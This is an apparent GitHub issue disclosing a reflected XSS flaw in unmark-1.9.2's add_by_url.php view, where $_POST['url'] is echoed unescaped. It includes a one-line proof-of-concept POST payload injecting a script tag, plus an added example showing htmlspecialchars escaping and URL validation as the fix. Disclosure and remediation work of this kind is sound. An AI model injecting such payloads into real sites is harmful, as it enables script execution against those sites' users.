Open xjzzzxx opened 4 months ago
Hello,
I would like to report an XSS vulnerability in unmark-1.9.2.
The path of the vulnerability.
In file application/views/marks/add_by_url.php
```php
if ( $_POST ) : // Line 3
    $url = $_POST['url']; // Line 7
    echo '<p><strong>URL:</strong>' . $url . '</p>'; // Line 8
```
We see that there is no check between the input $_POST["url"] and the output (Line 8).
Thus the XSS will happen at:
```php
echo '<p><strong>URL:</strong>' . $url . '</p>';
```
PoC:
```
POST /marks/add_by_url
add_from_url=1&url=</p><script>alert('xss')</script>
```
Manual verification:
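
Added example, not part of the original report and not code from the Unmark project: the output pattern quoted above next to a hardened form that escapes the value for the HTML text context where it is printed. The function names `render_url_unsafe`, `render_url_safe` and `is_acceptable_url` are hypothetical, and the sample inputs are constructed (the first is the value from the report's PoC).

```php
<?php
// Added illustration; the function names are hypothetical, not Unmark's code.

// The pattern from the report: a request value concatenated into HTML as-is.
function render_url_unsafe(string $url): string
{
    return '<p><strong>URL:</strong>' . $url . '</p>';
}

// Hardened form: escape for the HTML text context at the point of output.
function render_url_safe(string $url): string
{
    $escaped = htmlspecialchars($url, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<p><strong>URL:</strong>' . $escaped . '</p>';
}

// Optional input check: accept only well-formed http(s) URLs.
// This complements output escaping; it does not replace it.
function is_acceptable_url(string $url): bool
{
    if (filter_var($url, FILTER_VALIDATE_URL) === false) {
        return false;
    }
    $scheme = strtolower((string) parse_url($url, PHP_URL_SCHEME));
    return in_array($scheme, ['http', 'https'], true);
}

// Constructed sample inputs: the PoC value from the report and a normal URL.
$samples = [
    "</p><script>alert('xss')</script>",
    'https://example.com/page?a=1&b=2',
];

foreach ($samples as $value) {
    echo 'valid:  ', var_export(is_acceptable_url($value), true), PHP_EOL;
    echo 'unsafe: ', render_url_unsafe($value), PHP_EOL;
    echo 'safe:   ', render_url_safe($value), PHP_EOL, PHP_EOL;
}
```

Escaping at output is the fix for the reported line; the URL check only narrows what the form accepts, since a syntactically valid URL can still contain characters that need escaping.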